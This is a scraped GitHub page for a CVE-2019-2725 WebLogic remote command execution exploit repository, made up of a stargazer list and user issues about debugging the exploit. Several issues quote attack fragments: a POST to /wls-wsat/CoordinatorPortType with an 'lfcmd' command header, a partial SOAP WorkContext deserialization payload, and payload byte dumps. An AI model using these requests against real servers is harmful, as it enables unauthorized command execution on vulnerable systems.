lufeirider / cve-2019-2725 Goto Github PK

View Code? Open in Web Editor NEW

438.0 438.0 162.0 663 KB

CVE-2019-2725 命令回显

Java 4.65% Python 95.35%

cve-2019-2725's People

Contributors

Stargazers

Watchers

Forkers

0xa-saline 5ty4ck tinsyner lwzxs z3r023 chennqqi lucifaer liu0tufang arewss h1d3r lp008 asdfkj1 nnewkin lvmaple hctymff imklever ouououl aqqdgyz fbion je6k doge-dog freeide zhengjim bay0net useafter igbaolan hkylin gl4c13r kyhvedn thinkergod thiefsix yuxiaoyou123 rockmelodies xxnbyy huangyuan666 jerrynotme crackercat thelostworldfree burpyang arongmh sry309 lengyun123456 guokers 0x09al ysymiaofu bravery9 secoba amshadows yaozg daimago delovt raystyle xiaomingdegithub aitalone killer-meow awesome-security ll-mf galaxylove feisec wangyi0127 explorer1092 iiiusky 3as0n eddylapis 0x6b7966 delsadan wooyun-evil ninacumt holax352 meizjm3i 1ik3 weiwhy no952712138 peterpeter228 cnrstar pt001 triplekill dawnyang-cn microqs jimdx pimps tears2015 greatspider135 yizhimanpadewoniu a0er zaijianbch lanpan999 54xxcong jaychouzzk greatfax xdcty2014 1f3lse sheldon1998 asdlei99 dido1960 nglnx testaddress1 test123test111 ximendaguanren66 362902755

cve-2019-2725's Issues

COMPILATION ERROR

COMPILATION ERROR :
[INFO] -------------------------------------------------------------
[ERROR] ysoserial_hktalent/src/main/java/ysoserial/payloads/JDK7u21_2.java:[14,32] error: package weblogic.servlet.internal does not exist
[ERROR] ysoserial_hktalent/src/main/java/ysoserial/payloads/JDK7u21_2.java:[15,32] error: package weblogic.servlet.internal does not exist
[ERROR] ysoserial_hktalent/src/main/java/ysoserial/payloads/JDK7u21_2.java:[16,24] error: package weblogic.xml.util does not exist

师傅 10.3.6 回显检测可以修改执行的命令吗

可以回显这个 test webloigc cve_2019_2725
可以确定是一定存在此漏洞的吗，
请问如何执行其他命令呢

用命令执行那个会显示500，无法回显

> 被当作字符？

Content-Length: 0

您好，打扰了。
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 127.0.0.1:7001
Accept-Encoding: gzip, deflate
Accept: /
content-type: text/xml
lfcmd: echo lufei test
Content-Length: 264253

response:
HTTP/1.1 200 OK
Date: Sun, 16 Jun 2019 09:07:16 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 0

weblogic-2019-2725_10.3.6回显检测是成功的，代码执行与预期不一致，麻烦您有空时解答一下，十分感谢

同样的payload不同的win系统，一个正确一个不对？[Ljava.lang.Object; cannot be cast to java.lang.String

错误消息

<faultcode>S:Server</faultcode><faultstring>
[Ljava.lang.Object; cannot be cast to java.lang.String
............

java.io.IOException javax.xml.stream.XMLStreamException: Error at line:0 col:0 Line:32 A '"'

use
https://raw.githubusercontent.com/lufeirider/CVE-2019-2725/master/weblogic-2019-2725_12.1.3命令执行.txt
error:

<env:Envelope xmlns:env="http://schemas.xmlsoap.org/soap/envelope/"><env:Header/><env:Body><env:Fault><faultcode>env:Client</faultcode><faultstring>Unable to parse the incoming request</faultstring><detail><java:string xmlns:java="java.io">java.io.IOException
javax.xml.stream.XMLStreamException: Error at line:0 col:0 Line:32 A '"' was expected,  this attribute was not terminated by a matching double quote
Error at line:0 col:0 Line:32 A '"' was expected,  this attribute was not terminated by a matching double quote
</java:string></detail></env:Fault></env:Body></env:Envelope>

javassist.CannotCompileException: [source error] no such class: weblogic.work.ExecuteThred


Error while generating or serializing payload
javassist.CannotCompileException: [source error] no such class: weblogic.work.ExecuteThred
	at javassist.CtBehavior.insertAfter(CtBehavior.java:877)

没有这个类哦

大佬，为什么这个只能执行echo命令？其他的linux命令不行

其他的linux 例如：ls，pwd，whoami都没有回显？？？是网站端进行了屏蔽吗？

JDK7u21.java > calc.xml poc is not work

0x01 run code

0x02 get byte xml

0x03 request byte xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   
<soapenv:Header> <wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo> 
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> 
<java><class><string>oracle.toplink.internal.sessions.UnitOfWorkChangeSet</string>
 <void>

 </array>   
 </void>
</class></java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body><asy:onAsyncDelivery/></soapenv:Body>
</soapenv:Envelope>

weblogic12

[oracle@d7ab724a0849 config]$ cat config.xml |grep version
<?xml version="1.0" encoding="UTF-8"?>
  <domain-version>12.1.3.0.0</domain-version>
  <configuration-version>12.1.3.0.0</configuration-version>
[oracle@d7ab724a0849 config]$

java.lang.NullPointerException

weblogic 10

java.lang.Class cannot be cast to java.lang.String

0x04 10.3.6 command poc byte to string

use poc in https://github.com/lufeirider/CVE-2019-2725/blob/master/CVE-2019-2725.py

0x05 final comparison

<void index="1754"> with 1648 is not number of objects
<void index="1647"> with 1648 ???

<void   index="1758"> | <byte>108</byte>
<void   index="1759"> | <byte>102</byte>
<void   index="1760"> | <byte>99</byte>
<void   index="1761"> | <byte>109</byte>
<void   index="1762"> | <byte>100</byte>